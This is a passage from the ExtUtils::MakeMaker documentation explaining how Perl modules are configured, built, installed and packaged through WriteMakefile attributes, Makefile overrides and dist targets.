make inst_perl by default writes some documentation of what has been done into the file $(INSTALLARCHLIB)/perllocal.pod. This can be bypassed by calling make pure_inst_perl.
Warning: the inst_perl: target will most probably overwrite your existing perl binary. Use with care!
Sometimes you might want to build a statically linked perl although your system supports dynamic loading. In this case you may explicitly set the linktype with the invocation of the Makefile.PL or make:
perl Makefile.PL LINKTYPE=static # recommended
or
make LINKTYPE=static # works on most systems
MakeMaker needs to know, or to guess, where certain things are located. Especially INST_LIB and INST_ARCHLIB (where to put the files during the make(1) run), PERL_LIB and PERL_ARCHLIB (where to read existing modules from), and PERL_INC (header files and libperl*.*).
Extensions may be built either using the contents of the perl source directory tree or from the installed perl library. The recommended way is to build extensions after you have run 'make install' on perl itself. You can do that in any directory on your hard disk that is not below the perl source tree. The support for extensions below the ext directory of the perl distribution is only good for the standard extensions that come with perl.
If an extension is being built below the ext/ directory of the perl source then MakeMaker will set PERL_SRC automatically (e.g., ../..). If PERL_SRC is defined and the extension is recognized as a standard extension, then other variables default to the following:
PERL_INC = PERL_SRC
PERL_LIB = PERL_SRC/lib
PERL_ARCHLIB = PERL_SRC/lib
INST_LIB = PERL_LIB
INST_ARCHLIB = PERL_ARCHLIB
If an extension is being built away from the perl source then MakeMaker will leave PERL_SRC undefined and default to using the installed copy of the perl library. The other variables default to the following:
PERL_INC = $archlibexp/CORE
PERL_LIB = $privlibexp
PERL_ARCHLIB = $archlibexp
INST_LIB = ./blib/lib
INST_ARCHLIB = ./blib/arch
If perl has not yet been installed then PERL_SRC can be defined on the command line as shown in the previous section.
If you don't want to keep the defaults for the INSTALL* macros, MakeMaker helps you to minimize the typing needed: the usual relationship between INSTALLPRIVLIB and INSTALLARCHLIB is determined by Configure at perl compilation time. MakeMaker supports the user who sets INSTALLPRIVLIB. If INSTALLPRIVLIB is set, but INSTALLARCHLIB not, then MakeMaker defaults the latter to be the same subdirectory of INSTALLPRIVLIB as Configure decided for the counterparts in %Config, otherwise it defaults to INSTALLPRIVLIB. The same relationship holds for INSTALLSITELIB and INSTALLSITEARCH.
MakeMaker gives you much more freedom than needed to configure internal variables and get different results. It is worth mentioning that make(1) also lets you configure most of the variables that are used in the Makefile. But in the majority of situations this will not be necessary, and should only be done if the author of a package recommends it (or you know what you're doing).
The following attributes may be specified as arguments to WriteMakefile() or as NAME=VALUE pairs on the command line. Attributes that became available with later versions of MakeMaker are indicated.
In order to maintain portability of attributes with older versions of MakeMaker you may want to use App::EUMM::Upgrade with your Makefile.PL.
One line description of the module. Will be included in PPD file.
Name of the file that contains the package description. MakeMaker looks for a line in the POD matching /^($package\s-\s)(.*)/. This is typically the first line in the "=head1 NAME" section. $2 becomes the abstract.
Array of strings containing name (and email address) of package author(s). Is used in CPAN Meta files (META.yml or META.json) and PPD (Perl Package Description) files for PPM (Perl Package Manager).
Used when creating PPD files for binary packages. It can be set to a full or relative path or URL to the binary archive for a particular architecture. For example:
perl Makefile.PL BINARY_LOCATION=x86/Agent.tar.gz
builds a PPD package that references a binary of the Agent package, located in the x86 directory relative to the PPD itself.
Available in version 6.5503 and above.
A hash of modules that are needed to build your module but not run it.
This will go into the build_requires field of your META.yml and the build of the prereqs field of your META.json.
Defaults to { "ExtUtils::MakeMaker" => 0 } if this attribute is not specified.
The format is the same as PREREQ_PM.
Ref to array of *.c file names. Initialised from a directory scan and the values portion of the XS attribute hash. This is not currently used by MakeMaker but may be handy in Makefile.PLs.
String that will be included in the compiler call command line between the arguments INC and OPTIMIZE.
Arrayref. E.g. [qw(archname manext)] defines ARCHNAME & MANEXT from config.sh. MakeMaker will add to CONFIG the following values anyway: ar cc cccdlflags ccdlflags dlext dlsrc ld lddlflags ldflags libc lib_ext obj_ext ranlib sitelibexp sitearchexp so
CODE reference. The subroutine should return a hash reference. The hash may contain further attributes, e.g. {LIBS => ...}, that have to be determined by some evaluation method.
Available in version 6.52 and above.
A hash of modules that are required to run Makefile.PL itself, but not to run your distribution.
This will go into the configure_requires field of your META.yml and the configure of the prereqs field of your META.json.
Defaults to { "ExtUtils::MakeMaker" => 0 } if this attribute is not specified.
The format is the same as PREREQ_PM.
Something like "-DHAVE_UNISTD_H"
This is the root directory into which the code will be installed. It prepends itself to the normal prefix. For example, if your code would normally go into /usr/local/lib/perl you could set DESTDIR=~/tmp/ and installation would go into ~/tmp/usr/local/lib/perl.
This is primarily of use for people who repackage Perl modules.
NOTE: Due to the nature of make, it is important that you put the trailing slash on your DESTDIR. ~/tmp/ not ~/tmp.
Ref to array of subdirectories containing Makefile.PLs e.g. ['sdbm'] in ext/SDBM_File
A safe filename for the package.
Defaults to NAME below but with :: replaced with -.
For example, Foo::Bar becomes Foo-Bar.
Your name for distributing the package with the version number included. This is used by 'make dist' to name the resulting archive file.
Defaults to DISTNAME-VERSION.
For example, version 1.04 of Foo::Bar becomes Foo-Bar-1.04.
On some OS's where . has special meaning VERSION_SYM may be used in place of VERSION.
Specifies the extension of the module's loadable object. For example:
DLEXT => 'unusual_ext', # Default value is $Config{so}
NOTE: When using this option to alter the extension of a module's loadable object, it is also necessary that the module's pm file specifies the same change:
local $DynaLoader::dl_dlext = 'unusual_ext';
Hashref of symbol names for routines to be made available as universal symbols. Each key/value pair consists of the package name and an array of routine names in that package. Used only under AIX, OS/2, VMS and Win32 at present. The routine names supplied will be expanded in the same way as XSUB names are expanded by the XS() macro. Defaults to
{"$(NAME)" => ["boot_$(NAME)" ] }
e.g.
{"RPC" => [qw( boot_rpcb rpcb_gettime getnetconfigent )],
"NetconfigPtr" => [ 'DESTROY'] }
Please see the ExtUtils::Mksymlists documentation for more information about the DL_FUNCS, DL_VARS and FUNCLIST attributes.
Array of symbol names for variables to be made available as universal symbols. Used only under AIX, OS/2, VMS and Win32 at present. Defaults to []. (e.g. [ qw(Foo_version Foo_numstreams Foo_tree ) ])
Array of extension names to exclude when doing a static build. This is ignored if INCLUDE_EXT is present. Consult INCLUDE_EXT for more details. (e.g. [ qw( Socket POSIX ) ] )
This attribute may be most useful when specified as a string on the command line: perl Makefile.PL EXCLUDE_EXT='Socket Safe'
Ref to array of executable files. The files will be copied to the INST_SCRIPT directory. Make realclean will delete them from there again.
If your executables start with something like #!perl or #!/usr/bin/perl MakeMaker will change this to the path of the perl 'Makefile.PL' was invoked with so the programs will be sure to run properly even if perl is not in /usr/bin/perl.
The name of the Makefile to be produced. This is used for the second Makefile that will be produced for the MAP_TARGET.
Defaults to 'Makefile' or 'Descrip.MMS' on VMS.
(Note: we couldn't use MAKEFILE because dmake uses this for something else).
Perl binary able to run this extension, load XS modules, etc...
Like PERLRUN, except it uses FULLPERL.
Like PERLRUNINST, except it uses FULLPERL.
This provides an alternate means to specify function names to be exported from the extension. Its value is a reference to an array of function names to be exported by the extension. These names are passed through unaltered to the linker options file.
Ref to array of *.h file names. Similar to C.
This attribute is used to specify names to be imported into the extension. Takes a hash ref.
It is only used on OS/2 and Win32.
Include file dirs eg: "-I/usr/5include -I/path/to/inc"
Array of extension names to be included when doing a static build. MakeMaker will normally build with all of the installed extensions when doing a static build, and that is usually the desired behavior. If INCLUDE_EXT is present then MakeMaker will build only with those extensions which are explicitly mentioned. (e.g. [ qw( Socket POSIX ) ])
It is not necessary to mention DynaLoader or the current extension when filling in INCLUDE_EXT. If the INCLUDE_EXT is mentioned but is empty then only DynaLoader and the current extension will be included in the build.
This attribute may be most useful when specified as a string on the command line: perl Makefile.PL INCLUDE_EXT='POSIX Socket Devel::Peek'
Used by 'make install', which copies files from INST_ARCHLIB to this directory if INSTALLDIRS is set to perl.
Directory to install binary files (e.g. tkperl) into if INSTALLDIRS=perl.
Determines which of the sets of installation directories to choose: perl, site or vendor. Defaults to site.
These directories get the man pages at 'make install' time if INSTALLDIRS=perl. Defaults to $Config{installman*dir}.
If set to 'none', no man pages will be installed.
Used by 'make install', which copies files from INST_LIB to this directory if INSTALLDIRS is set to perl.
Defaults to $Config{installprivlib}.
Used by 'make install' which copies files from INST_SCRIPT to this directory if INSTALLDIRS=perl.
Used by 'make install', which copies files from INST_ARCHLIB to this directory if INSTALLDIRS is set to site (default).
Used by 'make install', which copies files from INST_BIN to this directory if INSTALLDIRS is set to site (default).
Used by 'make install', which copies files from INST_LIB to this directory if INSTALLDIRS is set to site (default).
These directories get the man pages at 'make install' time if INSTALLDIRS=site (default). Defaults to $(SITEPREFIX)/man/man$(MAN*EXT).
If set to 'none', no man pages will be installed.
Used by 'make install' which copies files from INST_SCRIPT to this directory if INSTALLDIRS is set to site (default).
Used by 'make install', which copies files from INST_ARCHLIB to this directory if INSTALLDIRS is set to vendor.
Used by 'make install', which copies files from INST_BIN to this directory if INSTALLDIRS is set to vendor.
Used by 'make install', which copies files from INST_LIB to this directory if INSTALLDIRS is set to vendor.
These directories get the man pages at 'make install' time if INSTALLDIRS=vendor. Defaults to $(VENDORPREFIX)/man/man$(MAN*EXT).
If set to 'none', no man pages will be installed.
Used by 'make install' which copies files from INST_SCRIPT to this directory if INSTALLDIRS is set to vendor.
Same as INST_LIB for architecture dependent files.
Directory to put real binary files during 'make'. These will be copied to INSTALLBIN during 'make install'
Directory where we put library files of this extension while building it.
Directory to hold the man pages at 'make' time
Directory to hold the man pages at 'make' time
Directory where executable files should be installed during 'make'. Defaults to "./blib/script", just to have a dummy location during testing. make install will copy the files in INST_SCRIPT to INSTALLSCRIPT.
Program to be used to link libraries for dynamic loading.
Defaults to $Config{ld}.
Any special flags that might need to be passed to ld to create a shared library suitable for dynamic loading. It is up to the makefile to use it. (See "lddlflags" in Config)
Defaults to $Config{lddlflags}.
Defaults to "$(OBJECT)" and is used in the ld command to specify what files to link/load from (also see dynamic_lib below for how to specify ld flags)
LIB should only be set at perl Makefile.PL time but is allowed as a MakeMaker argument. It has the effect of setting both INSTALLPRIVLIB and INSTALLSITELIB to that value regardless any explicit setting of those arguments (or of PREFIX). INSTALLARCHLIB and INSTALLSITEARCH are set to the corresponding architecture subdirectory.
The filename of the perllibrary that will be used together with this extension. Defaults to libperl.a.
An anonymous array of alternative library specifications to be searched for (in order) until at least one library is found. E.g.
'LIBS' => ["-lgdbm", "-ldbm -lfoo", "-L/path -ldbm.nfs"]
Mind, that any element of the array contains a complete set of arguments for the ld command. So do not specify
'LIBS' => ["-ltcl", "-ltk", "-lX11"]
See ODBM_File/Makefile.PL for an example, where an array is needed. If you specify a scalar as in
'LIBS' => "-ltcl -ltk -lX11"
MakeMaker will turn it into an array with one element.
Available in version 6.31 and above.
The licensing terms of your distribution. Generally it's "perl_5" for the same license as Perl itself.
See CPAN::Meta::Spec for the list of options.
Defaults to "unknown".
'static' or 'dynamic' (default unless usedl=undef in config.sh). Should only be used to force static linking (also see linkext below).
When this is set to 1, OBJECT will be automagically derived from O_FILES.
Variant of make you intend to run the generated Makefile with. This parameter lets Makefile.PL know what make quirks to account for when generating the Makefile.
MakeMaker also honors the MAKE environment variable. This parameter takes precedence.
Currently the only significant values are 'dmake' and 'nmake' for Windows users, instructing MakeMaker to generate a Makefile in the flavour of DMake ("Dennis Vadura's Make") or Microsoft NMake respectively.
Defaults to $Config{make}, which may go looking for a Make program in your environment.
How are you supposed to know what flavour of Make a Makefile has been generated for if you didn't specify a value explicitly? Search the generated Makefile for the definition of the MAKE variable, which is used to recursively invoke the Make utility. That will tell you what Make you're supposed to invoke the Makefile with.
Boolean which tells MakeMaker that it should include the rules to make a perl. This is handled automatically as a switch by MakeMaker. The user normally does not need it.
When 'make clean' or similar is run, the $(FIRST_MAKEFILE) will be backed up at this location.
Defaults to $(FIRST_MAKEFILE).old or $(FIRST_MAKEFILE)_old on VMS.
Hashref of pod-containing files. MakeMaker will default this to all EXE_FILES files that include POD directives. The files listed here will be converted to man pages and installed as was requested at Configure time.
This hash should map POD files (or scripts containing POD) to the man file names under the blib/man1/ directory, as in the following example:
MAN1PODS => {
'doc/command.pod' => 'blib/man1/command.1',
'scripts/script.pl' => 'blib/man1/script.1',
}
Hashref that assigns to *.pm and *.pod files the files into which the manpages are to be written. MakeMaker parses all *.pod and *.pm files for POD directives. Files that contain POD will be the default keys of the MAN3PODS hashref. These will then be converted to man pages during make and will be installed during make install.
Example similar to MAN1PODS.
If it is intended that a new perl binary be produced, this variable may hold a name for that binary. Defaults to perl
Available in version 6.46 and above.
A hashref of items to add to the CPAN Meta file (META.yml or META.json).
They differ in how they behave if they have the same key as the default metadata. META_ADD will override the default value with its own. META_MERGE will merge its value with the default.
Unless you want to override the defaults, prefer META_MERGE so as to get the advantage of any future defaults.
Where prereqs are concerned, if META_MERGE is used, prerequisites are merged with their counterpart WriteMakefile() argument (PREREQ_PM is merged into {prereqs}{runtime}{requires}, BUILD_REQUIRES into {prereqs}{build}{requires}, CONFIGURE_REQUIRES into {prereqs}{configure}{requires}, and TEST_REQUIRES into {prereqs}{test}{requires}). When prereqs are specified with META_ADD, the only prerequisites added to the file come from the metadata, not WriteMakefile() arguments.
Note that these configuration options are only used for generating META.yml and META.json -- they are NOT used for MYMETA.yml and MYMETA.json. Therefore data in these fields should NOT be used for dynamic (user-side) configuration.
By default CPAN Meta specification 1.4 is used. In order to use CPAN Meta specification 2.0, indicate with meta-spec the version you want to use.
META_MERGE => {
"meta-spec" => { version => 2 },
resources => {
repository => {
type => 'git',
url => 'git://github.com/Perl-Toolchain-Gang/ExtUtils-MakeMaker.git',
web => 'https://github.com/Perl-Toolchain-Gang/ExtUtils-MakeMaker',
},
},
},
Available in version 6.48 and above.
The minimum required version of Perl for this distribution.
Either the 5.006001 or the 5.6.1 format is acceptable.
If the extension links to a library that it builds, set this to the name of the library (see SDBM_File)
The package representing the distribution. For example, Test::More or ExtUtils::MakeMaker. It will be used to derive information about the distribution such as the "DISTNAME", installation locations within the Perl library and where XS files will be looked for by default (see "XS").
NAME must be a valid Perl package name and it must have an associated .pm file. For example, Foo::Bar is a valid NAME and there must exist Foo/Bar.pm. Any XS code should be in Bar.xs unless stated otherwise.
Your distribution must have a NAME.
MakeMaker will figure out if an extension contains linkable code anywhere down the directory tree, and will set this variable accordingly, but you can speed it up a very little bit if you define this boolean variable yourself.
Command so make does not print the literal commands it's running.
By setting it to an empty string you can generate a Makefile that prints all commands. Mainly used in debugging MakeMaker itself.
Defaults to @.
Boolean. Attribute to inhibit descending into subdirectories.
When true, suppresses the generation and addition to the MANIFEST of the META.yml and META.json module meta-data files during 'make distdir'.
Defaults to false.
When true, suppresses the generation of MYMETA.yml and MYMETA.json module meta-data files during 'perl Makefile.PL'.
Defaults to false.
When true, suppresses the writing of packlist files for installs.
Defaults to false.
When true, suppresses the appending of installations to perllocal.
Defaults to false.
In general, any generated Makefile checks for the current version of MakeMaker and the version the Makefile was built under. If NO_VC is set, the version check is neglected. Do not write this into your Makefile.PL, use it interactively instead.
List of object files, defaults to '$(BASEEXT)$(OBJ_EXT)', but can be a long string or an array containing all object files, e.g. "tkpBind.o tkpButton.o tkpCanvas.o" or ["tkpBind.o", "tkpButton.o", "tkpCanvas.o"]
(Where BASEEXT is the last component of NAME, and OBJ_EXT is $Config{obj_ext}.)
Defaults to -O. Set it to -g to turn debugging on. The flag is passed to subdirectory makes.
Perl binary for tasks that can be done by miniperl.
Set only when MakeMaker is building the extensions of the Perl core distribution.
The call to the program that is able to compile perlmain.c. Defaults to $(CC).
Same as for PERL_LIB, but for architecture dependent files.
Used only when MakeMaker is building the extensions of the Perl core distribution (because normally $(PERL_ARCHLIB) is automatically in @INC, and adding it would get in the way of PERL5LIB).
Directory containing the Perl library to use.
Used only when MakeMaker is building the extensions of the Perl core distribution (because normally $(PERL_LIB) is automatically in @INC, and adding it would get in the way of PERL5LIB).
defaults to 0. Should be set to TRUE if the extension can work with the memory allocation routines substituted by the Perl malloc() subsystem. This should be applicable to most extensions with exceptions of those
with bugs in memory allocations which are caught by Perl's malloc();
which interact with the memory allocator in other ways than via malloc(), realloc(), free(), calloc(), sbrk() and brk();
which rely on special alignment which is not provided by Perl's malloc().
NOTE. Neglecting to set this flag in any one of the loaded extension nullifies many advantages of Perl's malloc(), such as better usage of system resources, error detection, memory usage reporting, catchable failure of memory allocations, etc.
Directory under which core modules are to be installed.
Defaults to $Config{installprefixexp}, falling back to $Config{installprefix}, $Config{prefixexp} or $Config{prefix} should $Config{installprefixexp} not exist.
Overridden by PREFIX.
Use this instead of $(PERL) when you wish to run perl. It will set up extra necessary flags for you.
Use this instead of $(PERL) when you wish to run perl to work with modules. It will add things like -I$(INST_ARCH) and other necessary flags so perl can see the modules you're about to install.
Directory containing the Perl source code (use of this should be avoided, it may be undefined)
Desired permission for directories. Defaults to 755.
Desired permission for read/writable files. Defaults to 644.
Desired permission for executable files. Defaults to 755.
MakeMaker can run programs to generate files for you at build time. By default any file named *.PL (except Makefile.PL and Build.PL) in the top level directory will be assumed to be a Perl program and run passing its own basename in as an argument. For example...
perl foo.PL foo
This behavior can be overridden by supplying your own set of files to search. PL_FILES accepts a hash ref, the key being the file to run and the value is passed in as the first argument when the PL file is run.
PL_FILES => {'bin/foobar.PL' => 'bin/foobar'}
Would run bin/foobar.PL like this:
perl bin/foobar.PL bin/foobar
If multiple files from one program are desired an array ref can be used.
PL_FILES => {'bin/foobar.PL' => [qw(bin/foobar1 bin/foobar2)]}
In this case the program will be run multiple times using each target file.
perl bin/foobar.PL bin/foobar1
perl bin/foobar.PL bin/foobar2
PL files are normally run after pm_to_blib and include INST_LIB and INST_ARCH in their @INC, so the just built modules can be accessed... unless the PL file is making a module (or anything else in PM) in which case it is run before pm_to_blib and does not include INST_LIB and INST_ARCH in its @INC. This apparently odd behavior is there for backwards compatibility (and it's somewhat DWIM).
Hashref of .pm files and *.pl files to be installed. e.g.
{'name_of_file.pm' => '$(INST_LIB)/install_as.pm'}
By default this will include *.pm and *.pl and the files found in the PMLIBDIRS directories. Defining PM in the Makefile.PL will override PMLIBDIRS.
Ref to array of subdirectories containing library files. Defaults to [ 'lib', $(BASEEXT) ]. The directories will be scanned and any files they contain will be installed in the corresponding location in the library. A libscan() method can be used to alter the behaviour. Defining PM in the Makefile.PL will override PMLIBDIRS.
(Where BASEEXT is the last component of NAME.)
A filter program, in the traditional Unix sense (input from stdin, output to stdout) that is passed on each .pm file during the build (in the pm_to_blib() phase). It is empty by default, meaning no filtering is done.
Great care is necessary when defining the command if quoting needs to be done. For instance, you would need to say:
{'PM_FILTER' => 'grep -v \\"^\\#\\"'}
to remove all the leading comments on the fly during the build. The extra \\ are necessary, unfortunately, because this variable is interpolated within the context of a Perl program built on the command line, and double quotes are what is used with the -e switch to build that command line. The # is escaped for the Makefile, since what is going to be generated will then be:
PM_FILTER = grep -v \"^\#\"
Without the \\ before the #, we'd have the start of a Makefile comment, and the macro would be incorrectly defined.
Release 5.005 grandfathered old global symbol names by providing preprocessor macros for extension source compatibility. As of release 5.6, these preprocessor definitions are not available by default. The POLLUTE flag specifies that the old names should still be defined:
perl Makefile.PL POLLUTE=1
Please inform the module author if this is necessary to successfully install a module under 5.6 or later.
Name of the executable used to run PPM_INSTALL_SCRIPT below. (e.g. perl)
Name of the script that gets executed by the Perl Package Manager after the installation of a package.
Name of the executable used to run PPM_UNINSTALL_SCRIPT below. (e.g. perl)
Name of the script that gets executed by the Perl Package Manager before the removal of a package.
This overrides all the default install locations. Man pages, libraries, scripts, etc... MakeMaker will try to make an educated guess about where to place things under the new PREFIX based on your Config defaults. Failing that, it will fall back to a structure which should be sensible for your platform.
If you specify LIB or any INSTALL* variables they will not be affected by the PREFIX.
Bool. If this parameter is true, failing to have the required modules (or the right versions thereof) will be fatal. perl Makefile.PL will die instead of simply informing the user of the missing dependencies.
It is extremely rare to have to use PREREQ_FATAL. Its use by module authors is strongly discouraged and should never be used lightly.
For dependencies that are required in order to run Makefile.PL, see CONFIGURE_REQUIRES.
Module installation tools have ways of resolving unmet dependencies but to do that they need a Makefile. Using PREREQ_FATAL breaks this. That's bad.
Assuming you have good test coverage, your tests should fail with missing dependencies informing the user more strongly that something is wrong. You can write a t/00compile.t test which will simply check that your code compiles and stop "make test" prematurely if it doesn't. See "BAIL_OUT" in Test::More for more details.
A hash of modules that are needed to run your module. The keys are the module names ie. Test::More, and the minimum version is the value. If the required version number is 0 any version will do.
This will go into the requires field of your META.yml and the runtime of the prereqs field of your META.json.
PREREQ_PM => {
# Require Test::More at least 0.47
"Test::More" => "0.47",
# Require any version of Acme::Buffy
"Acme::Buffy" => 0,
}
Bool. If this parameter is true, the prerequisites will be printed to stdout and MakeMaker will exit. The output format is an evalable hash ref.
$PREREQ_PM = {
'A::B' => Vers1,
'C::D' => Vers2,
...
};
If a distribution defines a minimal required perl version, this is added to the output as an additional line of the form:
$MIN_PERL_VERSION = '5.008001';
If BUILD_REQUIRES is not empty, it will be dumped as $BUILD_REQUIRES hashref.
RedHatism for PREREQ_PRINT. The output format is different, though:
perl(A::B)>=Vers1 perl(C::D)>=Vers2 ...
A minimal required perl version, if present, will look like this:
perl(perl)>=5.008001
Like PERLPREFIX, but only for the site install locations.
Defaults to $Config{siteprefixexp}. Perls prior to 5.6.0 didn't have an explicit siteprefix in the Config. In those cases $Config{installprefix} will be used.
Overridable by PREFIX
When true, perform the generation and addition to the MANIFEST of the SIGNATURE file in the distdir during 'make distdir', via 'cpansign -s'.
Note that you need to install the Module::Signature module to perform this operation.
Defaults to false.
Arrayref. E.g. [qw(name1 name2)] skip (do not write) sections of the Makefile. Caution! Do not use the SKIP attribute for the negligible speedup. It may seriously damage the resulting Makefile. Only use it if you really need it.
Available in version 6.64 and above.
A hash of modules that are needed to test your module but not run or build it.
This will go into the build_requires field of your META.yml and the test of the prereqs field of your META.json.
The format is the same as PREREQ_PM.
Ref to array of typemap file names. Use this when the typemaps are in some directory other than the current directory or when they are not named typemap. The last typemap in the list takes precedence. A typemap in the current directory has highest precedence, even if it isn't listed in TYPEMAPS. The default system typemap has lowest precedence.
Like PERLPREFIX, but only for the vendor install locations.
Defaults to $Config{vendorprefixexp}.
Overridable by PREFIX
If true, make install will be verbose
Your version number for distributing the package. This defaults to 0.1.
Instead of specifying the VERSION in the Makefile.PL you can let MakeMaker parse a file to determine the version number. The parsing routine requires that the file named by VERSION_FROM contains one single line to compute the version number. The first line in the file that contains something like a $VERSION assignment or package Name VERSION will be used. The following lines will be parsed o.k.:
# Good
package Foo::Bar 1.23; # 1.23
$VERSION = '1.00'; # 1.00
*VERSION = \'1.01'; # 1.01
($VERSION) = q$Revision$ =~ /(\d+)/g; # The digits in $Revision$
$FOO::VERSION = '1.10'; # 1.10
*FOO::VERSION = \'1.11'; # 1.11
but these will fail:
# Bad
my $VERSION = '1.01';
local $VERSION = '1.02';
local $FOO::VERSION = '1.30';
(Putting my or local on the preceding line will work o.k.)
"Version strings" are incompatible and should not be used.
# Bad
$VERSION = 1.2.3;
$VERSION = v1.2.3;
version objects are fine. As of MakeMaker 6.35 version.pm will be automatically loaded, but you must declare the dependency on version.pm. For compatibility with older MakeMaker you should load on the same line as $VERSION is declared.
# All on one line
use version; our $VERSION = qv(1.2.3);
The file named in VERSION_FROM is not added as a dependency to Makefile. This is not really correct, but it would be a major pain during development to have to rewrite the Makefile for any smallish change in that file. If you want to make sure that the Makefile contains the correct VERSION macro after any change of the file, you would have to do something like
depend => { Makefile => '$(VERSION_FROM)' }
See attribute depend below.
A sanitized VERSION with . replaced by _. For places where . has special meaning (some filesystems, RCS labels, etc...)
Hashref of .xs files. MakeMaker will default this. e.g.
{'name_of_file.xs' => 'name_of_file.c'}
The .c files will automatically be included in the list of files deleted by a make clean.
String of options to pass to xsubpp. This might include -C++ or -extern. Do not include typemaps here; the TYPEMAP parameter exists for that purpose.
May be set to -protoypes, -noprototypes or the empty string. The empty string is equivalent to the xsubpp default, or -noprototypes. See the xsubpp documentation for details. MakeMaker defaults to the empty string.
Your version number for the .xs file of this package. This defaults to the value of the VERSION attribute.
can be used to pass parameters to the methods which implement that part of the Makefile. Parameters are specified as a hash ref but are passed to the method as a hash.
{FILES => "*.xyz foo"}
{ANY_TARGET => ANY_DEPENDENCY, ...}
(ANY_TARGET must not be given a double-colon rule by MakeMaker.)
{TARFLAGS => 'cvfF', COMPRESS => 'gzip', SUFFIX => '.gz',
SHAR => 'shar -m', DIST_CP => 'ln', ZIP => '/bin/zip',
ZIPFLAGS => '-rl', DIST_DEFAULT => 'private tardist' }
If you specify COMPRESS, then SUFFIX should also be altered, as it is needed to tell make the target file of the compression. Setting DIST_CP to ln can be useful, if you need to preserve the timestamps on your files. DIST_CP can take the values 'cp', which copies the file, 'ln', which links the file, and 'best' which copies symbolic links and links the rest. Default is 'best'.
{ARMAYBE => 'ar', OTHERLDFLAGS => '...', INST_DYNAMIC_DEP => '...'}
{LINKTYPE => 'static', 'dynamic' or ''}
NB: Extensions that have nothing but *.pm files had to say
{LINKTYPE => ''}
with Pre-5.0 MakeMakers. Since version 5.00 of MakeMaker such a line can be deleted safely. MakeMaker recognizes when there's nothing to be linked.
{ANY_MACRO => ANY_VALUE, ...}
Anything put here will be passed to MY::postamble() if you have one.
{FILES => '$(INST_ARCHAUTODIR)/*.xyz'}
Specify the targets for testing.
{TESTS => 't/*.t'}
RECURSIVE_TEST_FILES can be used to include all directories recursively under t that contain .t files. It will be ignored if you provide your own TESTS attribute, defaults to false.
{RECURSIVE_TEST_FILES=>1}
{MAXLEN => 8}
If you cannot achieve the desired Makefile behaviour by specifying attributes you may define private subroutines in the Makefile.PL. Each subroutine returns the text it wishes to have written to the Makefile. To override a section of the Makefile you can either say:
sub MY::c_o { "new literal text" }
or you can edit the default by saying something like:
package MY; # so that "SUPER" works right
sub c_o {
my $inherited = shift->SUPER::c_o(@_);
$inherited =~ s/old text/new text/;
$inherited;
}
If you are running experiments with embedding perl as a library into other applications, you might find MakeMaker is not sufficient. You'd better have a look at ExtUtils::Embed which is a collection of utilities for embedding.
If you still need a different solution, try to develop another subroutine that fits your needs and submit the diffs to makemaker@perl.org
For a complete description of all MakeMaker methods see ExtUtils::MM_Unix.
Here is a simple example of how to add a new target to the generated Makefile:
sub MY::postamble {
return <<'MAKE_FRAG';
$(MYEXTLIB): sdbm/Makefile
cd sdbm && $(MAKE) all
MAKE_FRAG
}
WriteMakefile() now does some basic sanity checks on its parameters to protect against typos and malformatted values. This means some things which happened to work in the past will now throw warnings and possibly produce internal errors.
Some of the most common mistakes:
MAN3PODS => ' '
This is commonly used to suppress the creation of man pages. MAN3PODS takes a hash ref not a string, but the above worked by accident in old versions of MakeMaker.
The correct code is MAN3PODS => { }.
MakeMaker.pm uses the architecture-specific information from Config.pm. In addition it evaluates architecture specific hints files in a hints/ directory. The hints files are expected to be named like their counterparts in PERL_SRC/hints, but with an .pl file name extension (eg. next_3_2.pl). They are simply evaled by MakeMaker within the WriteMakefile() subroutine, and can be used to execute commands as well as to include special variables. The rules which hintsfile is chosen are the same as in Configure.
The hintsfile is eval()ed immediately after the arguments given to WriteMakefile are stuffed into a hash reference $self but before this reference becomes blessed. So if you want to do the equivalent to override or create an attribute you would say something like
$self->{LIBS} = ['-ldbm -lucb -lc'];
For authors of extensions MakeMaker provides several Makefile targets. Most of the support comes from the ExtUtils::Manifest module, where additional documentation can be found.
reports which files are below the build directory but not in the MANIFEST file and vice versa. (See ExtUtils::Manifest::fullcheck() for details)
reports which files are skipped due to the entries in the MANIFEST.SKIP file (See ExtUtils::Manifest::skipcheck() for details)
does a realclean first and then the distcheck. Note that this is not needed to build a new distribution as long as you are sure that the MANIFEST file is ok.
does a realclean first and then removes backup files such as *~, *.bak, *.old and *.orig
rewrites the MANIFEST file, adding all remaining files found (See ExtUtils::Manifest::mkmanifest() for details)
Copies all the files that are in the MANIFEST file to a newly created directory with the name $(DISTNAME)-$(VERSION). If that directory exists, it will be removed first.
Additionally, it will create META.yml and META.json module meta-data file in the distdir and add this to the distdir's MANIFEST. You can shut this behavior off with the NO_META flag.
Makes a distdir first, and runs a perl Makefile.PL, a make, and a make test in that directory.
First does a distdir. Then a command $(PREOP) which defaults to a null command, followed by $(TO_UNIX), which defaults to a null command under UNIX, and will convert files in distribution directory to UNIX format otherwise. Next it runs tar on that directory into a tarfile and deletes the directory. Finishes with a command $(POSTOP) which defaults to a null command.
Defaults to $(DIST_DEFAULT) which in turn defaults to tardist.
Runs a tardist first and uuencodes the tarfile.
First does a distdir. Then a command $(PREOP) which defaults to a null command. Next it runs shar on that directory into a sharfile and deletes the intermediate directory again. Finishes with a command $(POSTOP) which defaults to a null command. Note: For shdist to work properly a shar program that can handle directories is mandatory.
First does a distdir. Then a command $(PREOP) which defaults to a null command. Runs $(ZIP) $(ZIPFLAGS) on that directory into a zipfile. Then deletes that directory. Finishes with a command $(POSTOP) which defaults to a null command.
Does a $(CI) and a $(RCS_LABEL) on all files in the MANIFEST file.
Customization of the dist targets can be done by specifying a hash reference to the dist attribute of the WriteMakefile call. The following parameters are recognized:
CI ('ci -u')
COMPRESS ('gzip --best')
POSTOP ('@ :')
PREOP ('@ :')
TO_UNIX (depends on the system)
RCS_LABEL ('rcs -q -Nv$(VERSION_SYM):')
SHAR ('shar')
SUFFIX ('.gz')
TAR ('tar')
TARFLAGS ('cvf')
ZIP ('zip')
ZIPFLAGS ('-r')
An example:
WriteMakefile(
...other options...
dist => {
COMPRESS => "bzip2",
SUFFIX => ".bz2"
}
);
Long plaguing users of MakeMaker based modules has been the problem of getting basic information about the module out of the sources without running the Makefile.PL and doing a bunch of messy heuristics on the resulting Makefile. Over the years, it has become standard to keep this information in one or more CPAN Meta files distributed with each distribution.
The original format of CPAN Meta files was YAML and the corresponding file was called META.yml. In 2010, version 2 of the CPAN::Meta::Spec was released, which mandates JSON format for the metadata in order to overcome certain compatibility issues between YAML serializers and to avoid breaking older clients unable to handle a new version of the spec. The CPAN::Meta library is now standard for accessing old and new-style Meta files.
